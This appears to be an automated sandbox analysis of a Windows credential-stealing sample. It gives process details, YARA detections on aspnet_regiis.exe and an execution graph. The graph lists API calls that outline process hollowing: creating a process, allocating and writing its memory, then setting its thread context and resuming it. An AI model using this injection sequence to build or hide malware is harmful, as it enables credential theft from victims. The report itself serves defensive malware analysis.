                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:17:36:53
                                                                            Start date:29/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:3
                                                                            Start time:17:36:53
                                                                            Start date:29/12/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                            Imagebase:0x2e0000
                                                                            File size:43'016 bytes
                                                                            MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2082382204.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:6
                                                                            Start time:17:36:54
                                                                            Start date:29/12/2024
                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 1224
                                                                            Imagebase:0x3f0000
                                                                            File size:483'680 bytes
                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:13.6%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:7.2%
                                                                              Total number of Nodes:1480
                                                                              Total number of Limit Nodes:22
12322->12324 12344 6cef462a 12323->12344 12326 6cef3e9d __dosmaperr 14 API calls 12324->12326 12328 6cef48ec 12326->12328 12330 6cef0a90 _ValidateLocalCookies 5 API calls 12328->12330 12331 6cef2bc9 12330->12331 12332 6cef2cae 12331->12332 12334 6cef2cd3 12332->12334 12336 6cef2d33 12334->12336 12380 6cef5190 12334->12380 12335 6cef2bfe 12338 6cef2e22 12335->12338 12336->12335 12337 6cef5190 37 API calls 12336->12337 12337->12336 12339 6cef2c0b 12338->12339 12340 6cef2e33 12338->12340 12339->12314 12339->12315 12340->12339 12341 6cef3ee6 _free 14 API calls 12340->12341 12342 6cef2e5c 12341->12342 12343 6cef3f43 _free 14 API calls 12342->12343 12343->12339 12345 6cef346d __fassign 37 API calls 12344->12345 12346 6cef463c 12345->12346 12348 6cef464e 12346->12348 12370 6cef55f4 12346->12370 12349 6cef47af 12348->12349 12350 6cef47bc 12349->12350 12351 6cef47cb 12349->12351 12350->12328 12352 6cef47f8 12351->12352 12353 6cef47d3 12351->12353 12354 6cef523d ___scrt_uninitialize_crt WideCharToMultiByte 12352->12354 12353->12350 12376 6cef4876 12353->12376 12356 6cef4808 12354->12356 12357 6cef480f GetLastError 12356->12357 12358 6cef4825 12356->12358 12359 6cef3e9d __dosmaperr 14 API calls 12357->12359 12360 6cef4836 12358->12360 12361 6cef4876 14 API calls 12358->12361 12363 6cef481b 12359->12363 12360->12350 12362 6cef523d ___scrt_uninitialize_crt WideCharToMultiByte 12360->12362 12361->12360 12364 6cef484e 12362->12364 12365 6cef3ed3 _free 14 API calls 12363->12365 12364->12350 12366 6cef4855 GetLastError 12364->12366 12365->12350 12367 6cef3e9d __dosmaperr 14 API calls 12366->12367 12368 6cef4861 12367->12368 12369 6cef3ed3 _free 14 API calls 12368->12369 12369->12350 12373 6cef541c 12370->12373 12374 6cef5531 _free 5 API calls 12373->12374 12375 6cef5432 12374->12375 12375->12348 12377 6cef4881 12376->12377 12378 6cef3ed3 _free 14 API calls 12377->12378 12379 6cef488a 12378->12379 12379->12350 12383 6cef5139 12380->12383 12384 6cef346d __fassign 37 API calls 
12383->12384 12385 6cef514d 12384->12385 12385->12334 12219 6cef2ff7 12220 6cef3009 12219->12220 12221 6cef300f 12219->12221 12222 6cef2f9f 14 API calls 12220->12222 12222->12221 11939 6cef3274 11940 6cef3f43 _free 14 API calls 11939->11940 11941 6cef3282 11940->11941 11942 6cef3f43 _free 14 API calls 11941->11942 11943 6cef3295 11942->11943 11944 6cef3f43 _free 14 API calls 11943->11944 11945 6cef32a6 11944->11945 11946 6cef3f43 _free 14 API calls 11945->11946 11947 6cef32b7 11946->11947 12386 6cef0d73 ___scrt_dllmain_exception_filter 12428 6cef4133 12429 6cef4143 12428->12429 12438 6cef4157 12428->12438 12430 6cef3ed3 _free 14 API calls 12429->12430 12431 6cef4148 12430->12431 12434 6cef3e16 __fassign 25 API calls 12431->12434 12432 6cef41ce 12433 6cef2e22 14 API calls 12432->12433 12435 6cef4233 12433->12435 12445 6cef4152 12434->12445 12437 6cef423c 12435->12437 12443 6cef4317 12435->12443 12467 6cef6ef1 12435->12467 12439 6cef3f43 _free 14 API calls 12437->12439 12438->12432 12447 6cef4247 12438->12447 12449 6cef4322 12438->12449 12439->12447 12440 6cef4303 12442 6cef3f43 _free 14 API calls 12440->12442 12442->12445 12446 6cef3e26 __fassign 11 API calls 12443->12446 12444 6cef3f43 _free 14 API calls 12444->12447 12448 6cef4321 12446->12448 12447->12440 12447->12444 12450 6cef432e 12449->12450 12450->12450 12451 6cef3ee6 _free 14 API calls 12450->12451 12452 6cef435c 12451->12452 12453 6cef6ef1 25 API calls 12452->12453 12454 6cef4388 12453->12454 12455 6cef3e26 __fassign 11 API calls 12454->12455 12456 6cef43d2 12455->12456 12457 6cef462a 37 API calls 12456->12457 12458 6cef449a 12457->12458 12476 6cef4116 12458->12476 12461 6cef44e8 12462 6cef462a 37 API calls 12461->12462 12463 6cef4525 12462->12463 12479 6cef4047 12463->12479 12466 6cef4322 43 API calls 12468 6cef6e3e 12467->12468 12469 6cef6e56 12468->12469 12470 6cef6e6a 12468->12470 12474 6cef6e8e 12468->12474 12469->12470 12471 6cef3ed3 _free 14 API calls 12469->12471 12470->12435 12472 6cef6e60 
12471->12472 12473 6cef3e16 __fassign 25 API calls 12472->12473 12473->12470 12474->12470 12475 6cef3ed3 _free 14 API calls 12474->12475 12475->12472 12502 6cef3f95 12476->12502 12480 6cef4055 12479->12480 12481 6cef4071 12479->12481 12484 6cef4669 14 API calls 12480->12484 12482 6cef4098 12481->12482 12483 6cef4078 12481->12483 12486 6cef523d ___scrt_uninitialize_crt WideCharToMultiByte 12482->12486 12485 6cef405f 12483->12485 12532 6cef4683 12483->12532 12484->12485 12485->12466 12488 6cef40a8 12486->12488 12489 6cef40af GetLastError 12488->12489 12490 6cef40c5 12488->12490 12491 6cef3e9d __dosmaperr 14 API calls 12489->12491 12494 6cef4683 15 API calls 12490->12494 12495 6cef40d6 12490->12495 12493 6cef40bb 12491->12493 12492 6cef523d ___scrt_uninitialize_crt WideCharToMultiByte 12496 6cef40ee 12492->12496 12497 6cef3ed3 _free 14 API calls 12493->12497 12494->12495 12495->12485 12495->12492 12496->12485 12498 6cef40f5 GetLastError 12496->12498 12497->12485 12499 6cef3e9d __dosmaperr 14 API calls 12498->12499 12500 6cef4101 12499->12500 12501 6cef3ed3 _free 14 API calls 12500->12501 12501->12485 12503 6cef3fbd 12502->12503 12504 6cef3fa3 12502->12504 12506 6cef3fc4 12503->12506 12507 6cef3fe3 12503->12507 12520 6cef4669 12504->12520 12512 6cef3fad FindFirstFileExW 12506->12512 12524 6cef46bf 12506->12524 12508 6cef51c1 __fassign MultiByteToWideChar 12507->12508 12509 6cef3ff2 12508->12509 12511 6cef3ff9 GetLastError 12509->12511 12514 6cef401f 12509->12514 12516 6cef46bf 15 API calls 12509->12516 12513 6cef3e9d __dosmaperr 14 API calls 12511->12513 12512->12461 12515 6cef4005 12513->12515 12514->12512 12517 6cef51c1 __fassign MultiByteToWideChar 12514->12517 12518 6cef3ed3 _free 14 API calls 12515->12518 12516->12514 12519 6cef4036 12517->12519 12518->12512 12519->12511 12519->12512 12521 6cef4674 12520->12521 12522 6cef467c 12520->12522 12523 6cef3f43 _free 14 API calls 12521->12523 12522->12512 12523->12522 12525 6cef4669 14 API calls 12524->12525 12526 
6cef46cd 12525->12526 12529 6cef46fe 12526->12529 12530 6cef62bc 15 API calls 12529->12530 12531 6cef46de 12530->12531 12531->12512 12533 6cef4669 14 API calls 12532->12533 12534 6cef4691 12533->12534 12535 6cef46fe 15 API calls 12534->12535 12536 6cef469f 12535->12536 12536->12485 12129 6cef5a31 12130 6cef5a36 12129->12130 12132 6cef5a59 12130->12132 12133 6cef74dc 12130->12133 12134 6cef750b 12133->12134 12135 6cef74e9 12133->12135 12134->12130 12136 6cef74f7 DeleteCriticalSection 12135->12136 12137 6cef7505 12135->12137 12136->12136 12136->12137 12138 6cef3f43 _free 14 API calls 12137->12138 12138->12134 12139 6cef8c0f 12140 6cef8c18 12139->12140 12141 6cef8cbe 12140->12141 12145 6cef8c3f 12140->12145 12142 6cef99a7 20 API calls 12141->12142 12144 6cef8cce 12142->12144 12143 6cef98d0 12145->12143 12146 6cef99a7 20 API calls 12145->12146 12147 6cef98ce 12146->12147 11948 6cef584c GetProcessHeap 12537 6cef6d09 12540 6cef699e 12537->12540 12538 6cef0a90 _ValidateLocalCookies 5 API calls 12539 6cef69ab 12538->12539 12540->12538 12540->12540 11949 6cef6248 11950 6cef6177 ___scrt_uninitialize_crt 66 API calls 11949->11950 11951 6cef6250 11950->11951 11959 6cef8256 11951->11959 11953 6cef6255 11969 6cef8301 11953->11969 11956 6cef627f 11957 6cef3f43 _free 14 API calls 11956->11957 11958 6cef628a 11957->11958 11960 6cef8262 ___scrt_is_nonwritable_in_current_image 11959->11960 11973 6cef3bda EnterCriticalSection 11960->11973 11962 6cef82d9 11987 6cef82f8 11962->11987 11964 6cef826d 11964->11962 11966 6cef82ad DeleteCriticalSection 11964->11966 11974 6cef898b 11964->11974 11968 6cef3f43 _free 14 API calls 11966->11968 11968->11964 11970 6cef6264 DeleteCriticalSection 11969->11970 11971 6cef8318 11969->11971 11970->11953 11970->11956 11971->11970 11972 6cef3f43 _free 14 API calls 11971->11972 11972->11970 11973->11964 11975 6cef8997 ___scrt_is_nonwritable_in_current_image 11974->11975 11976 6cef89b6 11975->11976 11977 6cef89a1 11975->11977 11983 6cef89b1 11976->11983 11990 
6cef6294 EnterCriticalSection 11976->11990 11978 6cef3ed3 _free 14 API calls 11977->11978 11979 6cef89a6 11978->11979 11981 6cef3e16 __fassign 25 API calls 11979->11981 11981->11983 11982 6cef89d3 11991 6cef8914 11982->11991 11983->11964 11985 6cef89de 12007 6cef8a05 11985->12007 12087 6cef3c22 LeaveCriticalSection 11987->12087 11989 6cef82e5 11989->11953 11990->11982 11992 6cef8936 11991->11992 11993 6cef8921 11991->11993 11996 6cef60ca ___scrt_uninitialize_crt 62 API calls 11992->11996 12005 6cef8931 11992->12005 11994 6cef3ed3 _free 14 API calls 11993->11994 11995 6cef8926 11994->11995 11997 6cef3e16 __fassign 25 API calls 11995->11997 11998 6cef894b 11996->11998 11997->12005 11999 6cef8301 14 API calls 11998->11999 12000 6cef8953 11999->12000 12001 6cef64c0 ___scrt_uninitialize_crt 25 API calls 12000->12001 12002 6cef8959 12001->12002 12010 6cef8f87 12002->12010 12005->11985 12006 6cef3f43 _free 14 API calls 12006->12005 12086 6cef62a8 LeaveCriticalSection 12007->12086 12009 6cef8a0d 12009->11983 12011 6cef8fad 12010->12011 12012 6cef8f98 12010->12012 12014 6cef8ff6 12011->12014 12019 6cef8fd4 12011->12019 12025 6cef3ec0 12012->12025 12015 6cef3ec0 __dosmaperr 14 API calls 12014->12015 12017 6cef8ffb 12015->12017 12021 6cef3ed3 _free 14 API calls 12017->12021 12018 6cef3ed3 _free 14 API calls 12022 6cef895f 12018->12022 12028 6cef8efb 12019->12028 12023 6cef9003 12021->12023 12022->12005 12022->12006 12024 6cef3e16 __fassign 25 API calls 12023->12024 12024->12022 12026 6cef3a9e _free 14 API calls 12025->12026 12027 6cef3ec5 12026->12027 12027->12018 12029 6cef8f07 ___scrt_is_nonwritable_in_current_image 12028->12029 12039 6cef75af EnterCriticalSection 12029->12039 12031 6cef8f15 12032 6cef8f3c 12031->12032 12033 6cef8f47 12031->12033 12040 6cef9014 12032->12040 12035 6cef3ed3 _free 14 API calls 12033->12035 12036 6cef8f42 12035->12036 12055 6cef8f7b 12036->12055 12039->12031 12058 6cef7686 12040->12058 12042 6cef902a 12071 6cef75f5 12042->12071 12044 6cef9024 
12044->12042 12045 6cef905c 12044->12045 12048 6cef7686 ___scrt_uninitialize_crt 25 API calls 12044->12048 12045->12042 12046 6cef7686 ___scrt_uninitialize_crt 25 API calls 12045->12046 12050 6cef9068 CloseHandle 12046->12050 12049 6cef9053 12048->12049 12052 6cef7686 ___scrt_uninitialize_crt 25 API calls 12049->12052 12050->12042 12053 6cef9074 GetLastError 12050->12053 12051 6cef90a4 12051->12036 12052->12045 12053->12042 12085 6cef75d2 LeaveCriticalSection 12055->12085 12057 6cef8f64 12057->12022 12059 6cef76a8 12058->12059 12060 6cef7693 12058->12060 12063 6cef3ec0 __dosmaperr 14 API calls 12059->12063 12065 6cef76cd 12059->12065 12061 6cef3ec0 __dosmaperr 14 API calls 12060->12061 12062 6cef7698 12061->12062 12064 6cef3ed3 _free 14 API calls 12062->12064 12066 6cef76d8 12063->12066 12067 6cef76a0 12064->12067 12065->12044 12068 6cef3ed3 _free 14 API calls 12066->12068 12067->12044 12069 6cef76e0 12068->12069 12070 6cef3e16 __fassign 25 API calls 12069->12070 12070->12067 12072 6cef766b 12071->12072 12073 6cef7604 12071->12073 12074 6cef3ed3 _free 14 API calls 12072->12074 12073->12072 12079 6cef762e 12073->12079 12075 6cef7670 12074->12075 12076 6cef3ec0 __dosmaperr 14 API calls 12075->12076 12077 6cef765b 12076->12077 12077->12051 12080 6cef3e9d 12077->12080 12078 6cef7655 SetStdHandle 12078->12077 12079->12077 12079->12078 12081 6cef3ec0 __dosmaperr 14 API calls 12080->12081 12082 6cef3ea8 _free 12081->12082 12083 6cef3ed3 _free 14 API calls 12082->12083 12084 6cef3ebb 12083->12084 12084->12051 12085->12057 12086->12009 12087->11989 11361 6cee8640 11385 6cee8660 __DllMainCRTStartup@12 11361->11385 11362 6cee7d90 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11362->11385 11363 6ceeb675 NtGetContextThread 11363->11385 11364 6ceedcf4 NtWriteVirtualMemory 11364->11385 11365 6ceeb946 NtAllocateVirtualMemory 11365->11385 11366 6ceef790 NtReadVirtualMemory 11366->11385 11367 6ceefc4b CreateProcessW 
11367->11385 11368 6ceeb7f2 NtAllocateVirtualMemory 11368->11385 11369 6cee6b80 7 API calls 11369->11385 11370 6cef0114 NtReadVirtualMemory 11370->11385 11371 6ceead15 VirtualAlloc 11371->11385 11372 6ceef96d NtWriteVirtualMemory 11372->11385 11373 6ceee5d6 NtCreateThreadEx 11373->11385 11374 6ceee095 NtWriteVirtualMemory 11374->11385 11375 6ceef2c8 NtWriteVirtualMemory 11375->11385 11376 6ceef9ee NtSetContextThread NtResumeThread 11376->11385 11377 6ceeec2d CloseHandle CloseHandle 11377->11385 11378 6ceeb996 NtWriteVirtualMemory 11378->11385 11379 6ceee967 NtSetContextThread NtResumeThread 11379->11385 11380 6ceeb398 CreateProcessW 11380->11385 11381 6cee1000 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11381->11385 11382 6ceebd0a NtWriteVirtualMemory 11382->11385 11383 6ceea4d5 GetConsoleWindow ShowWindow 11394 6cee1740 11383->11394 11385->11362 11385->11363 11385->11364 11385->11365 11385->11366 11385->11367 11385->11368 11385->11369 11385->11370 11385->11371 11385->11372 11385->11373 11385->11374 11385->11375 11385->11376 11385->11377 11385->11378 11385->11379 11385->11380 11385->11381 11385->11382 11385->11383 11386 6cee1740 27 API calls 11385->11386 11387 6ceeee5a 11385->11387 11390 6ceed9e4 NtReadVirtualMemory 11385->11390 11391 6ceef142 NtAllocateVirtualMemory 11385->11391 11392 6ceec376 NtWriteVirtualMemory 11385->11392 11393 6ceeffc9 CloseHandle CloseHandle 11385->11393 11386->11385 11388 6cef0a90 _ValidateLocalCookies 5 API calls 11387->11388 11389 6ceeee64 11388->11389 11390->11385 11391->11385 11392->11385 11393->11385 11398 6cee17a7 ___scrt_uninitialize_crt 11394->11398 11395 6cee2a7b GetModuleFileNameA 11395->11398 11396 6cee2e64 CloseHandle 11396->11398 11397 6cee4139 GetModuleFileNameA 11397->11398 11398->11395 11398->11396 11398->11397 11399 6cee3963 CloseHandle 11398->11399 11400 6cee398c CloseHandle CloseHandle 11398->11400 11401 6cee3d72 GetModuleFileNameA 11398->11401 11402 
6cee40aa GetCurrentProcess 11398->11402 11405 6cee2476 GetCurrentProcess 11398->11405 11408 6cee34ec VirtualProtect 11398->11408 11409 6cee3f1d MapViewOfFile 11398->11409 11410 6cee4171 CreateFileMappingA 11398->11410 11411 6cee2f07 MapViewOfFile 11398->11411 11412 6cee432b GetModuleFileNameA 11398->11412 11413 6cee33e3 VirtualProtect 11398->11413 11414 6cee3bde 11398->11414 11417 6cee288f K32GetModuleInformation 11398->11417 11418 6cee2c8f CreateFileMappingA 11398->11418 11419 6cee2b6d CreateFileA 11398->11419 11420 6cee41fb VirtualProtect 11398->11420 11422 6cee4375 MapViewOfFile 11398->11422 11399->11398 11400->11398 11401->11398 11403 6cef16c0 __DllMainCRTStartup@12 11402->11403 11404 6cee40eb GetModuleHandleA 11403->11404 11404->11398 11423 6cef16c0 11405->11423 11408->11398 11409->11398 11410->11398 11411->11398 11412->11398 11413->11398 11415 6cef0a90 _ValidateLocalCookies 5 API calls 11414->11415 11416 6cee3be8 11415->11416 11416->11385 11417->11398 11418->11398 11419->11398 11421 6cee42b8 ___scrt_uninitialize_crt 11420->11421 11421->11398 11422->11398 11424 6cee24bd GetModuleHandleA 11423->11424 11424->11398 12223 6cef8bc1 12224 6cef8be1 12223->12224 12227 6cef8c18 12224->12227 12226 6cef8c0b 12228 6cef8c1f 12227->12228 12229 6cef8cbe 12228->12229 12233 6cef8c3f 12228->12233 12230 6cef99a7 20 API calls 12229->12230 12232 6cef8cce 12230->12232 12231 6cef98d0 12231->12226 12232->12226 12233->12226 12233->12231 12234 6cef99a7 20 API calls 12233->12234 12235 6cef98ce 12234->12235 12235->12226 11425 6cef6180 11426 6cef618d 11425->11426 11427 6cef3ee6 _free 14 API calls 11426->11427 11428 6cef61a7 11427->11428 11429 6cef3f43 _free 14 API calls 11428->11429 11430 6cef61b3 11429->11430 11431 6cef61d9 11430->11431 11432 6cef3ee6 _free 14 API calls 11430->11432 11436 6cef61e5 11431->11436 11437 6cef6243 11431->11437 11438 6cef5712 11431->11438 11433 6cef61cd 11432->11433 11435 6cef3f43 _free 14 API calls 11433->11435 11435->11431 11439 6cef5531 _free 5 API calls 
11438->11439 11440 6cef572e 11439->11440 11441 6cef574c InitializeCriticalSectionAndSpinCount 11440->11441 11442 6cef5737 11440->11442 11441->11442 11442->11431 12387 6cef6f40 12390 6cef6f57 12387->12390 12389 6cef6f52 12391 6cef6f79 12390->12391 12392 6cef6f65 12390->12392 12394 6cef6f93 12391->12394 12395 6cef6f81 12391->12395 12393 6cef3ed3 _free 14 API calls 12392->12393 12396 6cef6f6a 12393->12396 12398 6cef346d __fassign 37 API calls 12394->12398 12401 6cef6f91 12394->12401 12397 6cef3ed3 _free 14 API calls 12395->12397 12399 6cef3e16 __fassign 25 API calls 12396->12399 12400 6cef6f86 12397->12400 12398->12401 12402 6cef6f75 12399->12402 12403 6cef3e16 __fassign 25 API calls 12400->12403 12401->12389 12402->12389 12403->12401 12541 6cef9100 12544 6cef911e 12541->12544 12543 6cef9116 12545 6cef9123 12544->12545 12546 6cef91b8 12545->12546 12547 6cef99e3 15 API calls 12545->12547 12546->12543 12548 6cef934f 12547->12548 12548->12543 10595 6cef0a9e 10596 6cef0adc 10595->10596 10597 6cef0aa9 10595->10597 10634 6cef0bf8 10596->10634 10599 6cef0ace 10597->10599 10600 6cef0aae 10597->10600 10607 6cef0af1 10599->10607 10601 6cef0ac4 10600->10601 10602 6cef0ab3 10600->10602 10626 6cef10ab 10601->10626 10606 6cef0ab8 10602->10606 10621 6cef10ca 10602->10621 10608 6cef0afd ___scrt_is_nonwritable_in_current_image 10607->10608 10661 6cef113b 10608->10661 10610 6cef0b04 __DllMainCRTStartup@12 10611 6cef0b2b 10610->10611 10612 6cef0bf0 10610->10612 10618 6cef0b67 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10610->10618 10672 6cef109d 10611->10672 10680 6cef12da IsProcessorFeaturePresent 10612->10680 10615 6cef0bf7 10616 6cef0b3a __RTC_Initialize 10616->10618 10675 6cef0fbb InitializeSListHead 10616->10675 10618->10606 10619 6cef0b48 10619->10618 10676 6cef1072 10619->10676 10774 6cef332e 10621->10774 11078 6cef1f80 10626->11078 10631 6cef10c7 10631->10606 10632 6cef1f8b 21 API calls 10633 6cef10b4 10632->10633 10633->10606 10635 6cef0c04 
___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10634->10635 10636 6cef0c35 10635->10636 10637 6cef0ca0 10635->10637 10653 6cef0c0d 10635->10653 11098 6cef110b 10636->11098 10638 6cef12da __DllMainCRTStartup@12 4 API calls 10637->10638 10642 6cef0ca7 ___scrt_is_nonwritable_in_current_image 10638->10642 10640 6cef0c3a 11107 6cef0fc7 10640->11107 10643 6cef0cc3 10642->10643 10644 6cef0cdd dllmain_raw 10642->10644 10646 6cef0cd8 10642->10646 10643->10606 10644->10643 10647 6cef0cf7 dllmain_crt_dispatch 10644->10647 10645 6cef0c3f __RTC_Initialize __DllMainCRTStartup@12 11110 6cef12ac 10645->11110 11119 6cef0250 10646->11119 10647->10643 10647->10646 10653->10606 10654 6cef0d49 10654->10643 10655 6cef0d52 dllmain_crt_dispatch 10654->10655 10655->10643 10657 6cef0d65 dllmain_raw 10655->10657 10656 6cef0250 __DllMainCRTStartup@12 5 API calls 10658 6cef0d30 10656->10658 10657->10643 10659 6cef0bf8 __DllMainCRTStartup@12 79 API calls 10658->10659 10660 6cef0d3e dllmain_raw 10659->10660 10660->10654 10662 6cef1144 10661->10662 10684 6cef14a8 IsProcessorFeaturePresent 10662->10684 10666 6cef1155 10667 6cef1159 10666->10667 10694 6cef3311 10666->10694 10667->10610 10670 6cef1170 10670->10610 10768 6cef1174 10672->10768 10674 6cef10a4 10674->10616 10675->10619 10677 6cef1077 ___scrt_release_startup_lock 10676->10677 10678 6cef14a8 IsProcessorFeaturePresent 10677->10678 10679 6cef1080 10677->10679 10678->10679 10679->10618 10681 6cef12f0 __DllMainCRTStartup@12 10680->10681 10682 6cef139b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10681->10682 10683 6cef13e6 __DllMainCRTStartup@12 10682->10683 10683->10615 10685 6cef1150 10684->10685 10686 6cef1f61 10685->10686 10703 6cef2397 10686->10703 10690 6cef1f72 10691 6cef1f7d 10690->10691 10717 6cef23d3 10690->10717 10691->10666 10693 6cef1f6a 10693->10666 10759 6cef5a5d 10694->10759 10697 6cef1f96 10698 6cef1f9f 10697->10698 10699 6cef1fa9 10697->10699 10700 6cef237c ___vcrt_uninitialize_ptd 6 
API calls 10698->10700 10699->10667 10701 6cef1fa4 10700->10701 10702 6cef23d3 ___vcrt_uninitialize_locks DeleteCriticalSection 10701->10702 10702->10699 10704 6cef23a0 10703->10704 10706 6cef23c9 10704->10706 10707 6cef1f66 10704->10707 10721 6cef2605 10704->10721 10708 6cef23d3 ___vcrt_uninitialize_locks DeleteCriticalSection 10706->10708 10707->10693 10709 6cef2349 10707->10709 10708->10707 10740 6cef2516 10709->10740 10712 6cef235e 10712->10690 10715 6cef2379 10715->10690 10718 6cef23fd 10717->10718 10719 6cef23de 10717->10719 10718->10693 10720 6cef23e8 DeleteCriticalSection 10719->10720 10720->10718 10720->10720 10726 6cef24cd 10721->10726 10724 6cef263d InitializeCriticalSectionAndSpinCount 10725 6cef2628 10724->10725 10725->10704 10727 6cef24e5 10726->10727 10728 6cef2508 10726->10728 10727->10728 10732 6cef2433 10727->10732 10728->10724 10728->10725 10731 6cef24fa GetProcAddress 10731->10728 10737 6cef243f ___vcrt_FlsGetValue 10732->10737 10733 6cef2455 LoadLibraryExW 10734 6cef24ba 10733->10734 10735 6cef2473 GetLastError 10733->10735 10736 6cef24b3 10734->10736 10738 6cef24c2 FreeLibrary 10734->10738 10735->10737 10736->10728 10736->10731 10737->10733 10737->10736 10739 6cef2495 LoadLibraryExW 10737->10739 10738->10736 10739->10734 10739->10737 10741 6cef24cd ___vcrt_FlsGetValue 5 API calls 10740->10741 10742 6cef2530 10741->10742 10743 6cef2549 TlsAlloc 10742->10743 10744 6cef2353 10742->10744 10744->10712 10745 6cef25c7 10744->10745 10746 6cef24cd ___vcrt_FlsGetValue 5 API calls 10745->10746 10747 6cef25e1 10746->10747 10748 6cef25fc TlsSetValue 10747->10748 10749 6cef236c 10747->10749 10748->10749 10749->10715 10750 6cef237c 10749->10750 10751 6cef2386 10750->10751 10752 6cef238c 10750->10752 10754 6cef2551 10751->10754 10752->10712 10755 6cef24cd ___vcrt_FlsGetValue 5 API calls 10754->10755 10756 6cef256b 10755->10756 10757 6cef2583 TlsFree 10756->10757 10758 6cef2577 10756->10758 10757->10758 10758->10752 10760 6cef5a6d 10759->10760 10761 6cef1162 
10759->10761 10760->10761 10763 6cef591d 10760->10763 10761->10670 10761->10697 10764 6cef5924 10763->10764 10765 6cef5967 GetStdHandle 10764->10765 10766 6cef59cd 10764->10766 10767 6cef597a GetFileType 10764->10767 10765->10764 10766->10760 10767->10764 10769 6cef1184 10768->10769 10770 6cef1180 10768->10770 10771 6cef12da __DllMainCRTStartup@12 4 API calls 10769->10771 10773 6cef1191 ___scrt_release_startup_lock 10769->10773 10770->10674 10772 6cef11fa 10771->10772 10773->10674 10780 6cef391b 10774->10780 10777 6cef1f8b 11058 6cef2273 10777->11058 10781 6cef3925 10780->10781 10784 6cef10cf 10780->10784 10788 6cef5691 10781->10788 10784->10777 10804 6cef5531 10788->10804 10790 6cef56ad 10791 6cef56c8 TlsGetValue 10790->10791 10792 6cef392c 10790->10792 10792->10784 10793 6cef56d0 10792->10793 10794 6cef5531 _free 5 API calls 10793->10794 10795 6cef56ec 10794->10795 10796 6cef570a TlsSetValue 10795->10796 10797 6cef393f 10795->10797 10798 6cef37e2 10797->10798 10799 6cef37fd 10798->10799 10800 6cef37ed 10798->10800 10799->10784 10817 6cef3803 10800->10817 10805 6cef555f 10804->10805 10809 6cef555b _free 10804->10809 10805->10809 10810 6cef546a 10805->10810 10808 6cef5579 GetProcAddress 10808->10809 10809->10790 10815 6cef547b ___vcrt_FlsGetValue 10810->10815 10811 6cef5526 10811->10808 10811->10809 10812 6cef5499 LoadLibraryExW 10813 6cef54b4 GetLastError 10812->10813 10812->10815 10813->10815 10814 6cef550f FreeLibrary 10814->10815 10815->10811 10815->10812 10815->10814 10816 6cef54e7 LoadLibraryExW 10815->10816 10816->10815 10818 6cef3818 10817->10818 10822 6cef381e 10817->10822 10820 6cef3f43 _free 14 API calls 10818->10820 10819 6cef3f43 _free 14 API calls 10821 6cef382a 10819->10821 10820->10822 10823 6cef3f43 _free 14 API calls 10821->10823 10822->10819 10824 6cef3835 10823->10824 10825 6cef3f43 _free 14 API calls 10824->10825 10826 6cef3840 10825->10826 10827 6cef3f43 _free 14 API calls 10826->10827 10828 6cef384b 10827->10828 10829 6cef3f43 _free 14 API 
calls 10828->10829 10830 6cef3856 10829->10830 10831 6cef3f43 _free 14 API calls 10830->10831 10832 6cef3861 10831->10832 10833 6cef3f43 _free 14 API calls 10832->10833 10834 6cef386c 10833->10834 10835 6cef3f43 _free 14 API calls 10834->10835 10836 6cef3877 10835->10836 10837 6cef3f43 _free 14 API calls 10836->10837 10838 6cef3885 10837->10838 10849 6cef362f 10838->10849 10843 6cef3f43 10844 6cef3f4e HeapFree 10843->10844 10845 6cef3f77 _free 10843->10845 10844->10845 10846 6cef3f63 10844->10846 10845->10799 10989 6cef3ed3 10846->10989 10850 6cef363b ___scrt_is_nonwritable_in_current_image 10849->10850 10865 6cef3bda EnterCriticalSection 10850->10865 10852 6cef366f 10866 6cef368e 10852->10866 10854 6cef3645 10854->10852 10856 6cef3f43 _free 14 API calls 10854->10856 10856->10852 10857 6cef369a 10858 6cef36a6 ___scrt_is_nonwritable_in_current_image 10857->10858 10870 6cef3bda EnterCriticalSection 10858->10870 10860 6cef36b0 10871 6cef38d0 10860->10871 10862 6cef36c3 10875 6cef36e3 10862->10875 10865->10854 10869 6cef3c22 LeaveCriticalSection 10866->10869 10868 6cef367c 10868->10857 10869->10868 10870->10860 10872 6cef3906 __fassign 10871->10872 10873 6cef38df __fassign 10871->10873 10872->10862 10873->10872 10878 6cef6628 10873->10878 10988 6cef3c22 LeaveCriticalSection 10875->10988 10877 6cef36d1 10877->10843 10879 6cef66a8 